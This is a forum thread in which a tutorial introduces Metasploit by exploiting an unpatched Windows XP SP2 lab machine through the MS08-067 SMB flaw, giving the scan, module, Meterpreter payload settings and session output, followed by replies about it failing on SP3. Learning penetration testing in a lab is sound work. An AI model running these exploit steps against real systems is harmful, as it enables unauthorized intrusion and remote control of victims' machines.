introduction to metasploit
This tutorial will give a basic introduction to metasploit.
In the process, we'll also exploit a machine and run meterpreter on it.
Everything that needs to be typed in console makes use of the code tag
example:
Also, I assume you have some basic understanding of networking and linux.
WARNING, it is illegal to access a machine in any way that you do not have permission to access and it might get you in jail. I am not responsible for the actions you take. You have been warned.
now on to the actual guide.
requirements:
backtrack 4 final
non-patched windows xp sp2 box
(confirmed that this does not work on xp sp3)
some patience
These are my ip's, make sure to change it to reflect your own settings
attacker: 192.168.198.129
victim: 192.168.198.130
Ok, first things first, make sure that metasploit is updated.
Code:
/pentest/exploits/fasttrack/fast-track.py -i
1
2
Do a nmap scan to make sure there are some open ports (with hopefully vulnerable services)
Code:
nmap -v 192.168.198.130
Nmap is done scanning and showed me 3 open ports. (if yours say filtered on all ports, try turning off any firewall)
These are port 135, 139, 445.
We're going to focus on port 445.
A quick search on google shows us that port 445 is commonly used for smb.
start up metasploit
when its done loading,
Code:
show exploits windows
We need an exploit for smb, so we need to choose one from smb folder. I used the ms08_067_netapi exploit.
Code:
use windows/smb/ms08_067_netapi
Notice that after we typed this, msf > changed to msf exploit(ms08_067_netapi)>
Great, so now we have an exploit, but what next?
an exploit is useless without a payload, so
This will give us a list of payloads compatible with the exploit.
We're going to use a meterpreter payload for this tutorial
Code:
set payload windows/meterpreter/bind_tcp
now to configure it all
Code:
info
set target 3
set rhost 192.168.198.130
target is the which windows version and service pack our victim is (our case xp sp2)
though, you could also leave it how it is.
rhost is the ip of the victim
everything else can be default.
if the payload was a reverse tcp, we would also need to set lhost
lhost is the attackers ip.
this is what we (should) get:
Quote:
[*] Started bind handler
[*] Triggering the vulnerability...
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.198.129:60087 -> 192.168.198.130:4444
meterpreter >
great! we're in!
lets see what commands we got at our disposal
under what username is meterpreter running?
what processes are running?
and so we can go on and on about what we can do with meterpreter, but that is outside of the scope of this tutorial.
hope this guide has been useful to someone, somewhere. :)
for a more indepth guide to what metasploit can do, check this link.
Metasploit Unleashed - Mastering the Framework
Re: introduction to metasploit
Nice one, _EcKo
Thank you.
If anyone might want to learn more about metasploit, read here : Metasploit Unleashed - Mastering the Framework
Re: introduction to metasploit
very good
thnx for sharing
Re: introduction to metasploit
Good post, thanks! I'll have to try this out when I get back.
Re: introduction to metasploit
First at all: thanx!
I have a little question... I used the option "set target 0" too, for an automatic test about so 'version' etc ... but this is the result:
Code:
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler[*] Automatically detecting the target...[*] Fingerprint: Windows XP Service Pack 3 - lang:English[*] Selected Target: Windows XP SP3 English (NX)[*] Triggering the vulnerability...[*] Exploit completed, but no session was created.
The firewall is off and the antivirus too... i am using vbox.
Maybe the system is patched for this kind of exploits?
In this case, it is possible to do something more with this exploit or can i consider this like a closed way?
Thanx (and sorry for my strange english :rolleyes: )
Re: introduction to metasploit
Quote:
Originally Posted by
reahel
First at all: thanx!
I have a little question... I used the option "set target 0" too, for an automatic test about so 'version' etc ... but this is the result:
Code:
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler[*] Automatically detecting the target...[*] Fingerprint: Windows XP Service Pack 3 - lang:English[*] Selected Target: Windows XP SP3 English (NX)[*] Triggering the vulnerability...[*] Exploit completed, but no session was created.
The firewall is off and the antivirus too... i am using vbox.
Maybe the system is patched for this kind of exploits?
In this case, it is possible to do something more with this exploit or can i consider this like a closed way?
Thanx (and sorry for my strange english :rolleyes: )
Your system is probably already patched against the ms08-067 vulnerability. It was published in Oct. 2008, here's the link.
Re: introduction to metasploit
Here is a lot of information on metasploit from the folks at Offensive Security :D Metasploit Unleashed - Mastering the Framework Edit:: Whoops didn't see Linus1907 already posted it.
I did a 45 minute presentation on that metasploit unleashed page and did most of the things on that page.
Re: introduction to metasploit
...nothing to do... for ' my ' version of xp.
But i am begin to understand how metasloit works... and i am happy for this.
Thanx! The link is great! And this community really active!
Re: introduction to metasploit
Quote:
Originally Posted by
Mr-Protocol
Here is a lot of information on metasploit from the folks at Offensive Security :D
Metasploit Unleashed - Mastering the Framework Edit:: Whoops didn't see Linus1907 already posted it.
I did a 45 minute presentation on that metasploit unleashed page and did most of the things on that page.
Definately worthy of mentioning. The Metasploit Unleashed course took me from maybesploit to megasploit in just 2 days.
Good job aswell _EcKo Thanks.
Re: introduction to metasploit
I wonder if this'll work with XP SP3.
I'll definitely try it tonight.
Cheers.
